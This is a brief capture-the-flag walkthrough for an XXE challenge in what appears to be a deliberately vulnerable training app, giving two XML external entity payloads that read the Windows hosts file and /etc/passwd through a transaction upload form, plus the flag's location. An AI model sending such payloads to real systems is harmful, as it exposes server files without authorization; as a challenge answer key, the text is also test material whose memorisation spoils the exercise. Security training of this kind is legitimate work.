Challenges

XXE

Depending on which OS the application is running, we can find different paths. For instance, if the application is running on the Windows server, we can for sure expect that there will be an available file in location C:/Windows/System32/drivers/etc/hosts. On the other hand, if the app is running on Linux, then we can expect that file /etc/passwd exists.

Solution

If you visit the transaction page, you will be able to see a form where you can upload transactions. This form requires an XML file format. If we upload a simple XXE sample, we will be able to see the output of specified paths.

• If you are trying to get C:/Windows/System32/drivers/etc/hosts:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo 
  [
      <!ELEMENT foo ANY >
      <!ENTITY xxe SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts" >
]>
<foo>&xxe;</foo>

• If you are trying to get etc/passwd:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo 
  [
      <!ELEMENT foo ANY >
      <!ENTITY xxe SYSTEM "file:///etc/passwd" >
]>
<foo>&xxe;</foo>

You will find the flag in the response header.